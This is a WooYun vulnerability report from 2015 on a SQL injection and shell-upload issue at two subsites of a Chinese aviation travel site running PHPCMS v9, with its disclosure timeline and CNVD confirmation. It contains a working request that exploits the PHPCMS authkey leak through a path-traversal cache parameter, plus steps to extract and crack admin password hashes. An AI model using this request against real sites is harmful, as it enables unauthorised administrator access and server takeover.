缺陷编号:WooYun-2015-0124425
漏洞标题:中国航空旅游网两分站sql注射可getshell
相关厂商:中国航空旅游网
漏洞作者:带头大哥
提交时间:2015-07-06 10:56
公开时间:2015-08-22 15:14
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向核心白帽子及相关领域专家公开
2015-07-28: 细节向普通白帽子公开
2015-08-07: 细节向实习白帽子公开
2015-08-22: 细节向公众公开
一点寒光万丈芒屠尽天下又何妨 深埋不改凌锐志 一聚风云便是皇
站为PHPCMSv9.存在authkey泄露,可获取管理员密码,可getshell参照:http://**.**.**.**/bugs/wooyun-2015-0105242
1 |
PHPCMS authkey泄露http://**.**.**.**/Ucy1NkkK6bLaeyfy2QPW0RYfmCzLAG1ihttp://**.**.**.**/XfQH5DWkHfKslt9zFGLwxHy9aLLuDHui |
下面用其中一个演示:
1 |
http://**.**.**.**/api.php?op=get_menu&act=ajax_getlist&callback=vwmcgevkwrndqfyuhtxa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin |
本地搭建环境,直接注入即可:
1 |
username,password,encrypt(盐值)<br>然后在cmd5破解即可登陆 |
我是来找礼物的!
危害等级:中
漏洞Rank:8
确认时间:2015-07-0815:12
CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.
暂无
最近高产啊!
原文连接
的情况下转载,若非则不得使用我方内容。